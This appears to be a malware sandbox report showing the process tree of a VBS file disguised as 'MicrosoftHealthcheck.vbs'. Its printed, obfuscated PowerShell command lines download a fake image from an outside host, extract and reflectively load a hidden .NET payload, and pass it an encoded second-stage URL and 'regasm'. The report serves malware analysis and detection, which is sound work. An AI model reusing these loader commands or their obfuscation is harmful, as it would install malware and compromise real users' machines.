| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\MicrosoftHealthcheck.vbs

    416
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2076
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) | . ( $EnV:CoMsPeC[4,24,25]-jOiN'')"

        2200

Process contents

No process loaded Click on a process in the tree above to load its data.